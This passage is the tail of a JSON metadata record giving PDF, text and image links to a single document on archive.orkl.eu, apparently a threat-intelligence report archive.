		"pdf": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.pdf",
		"text": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.txt",
		"img": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.jpg"
	}
}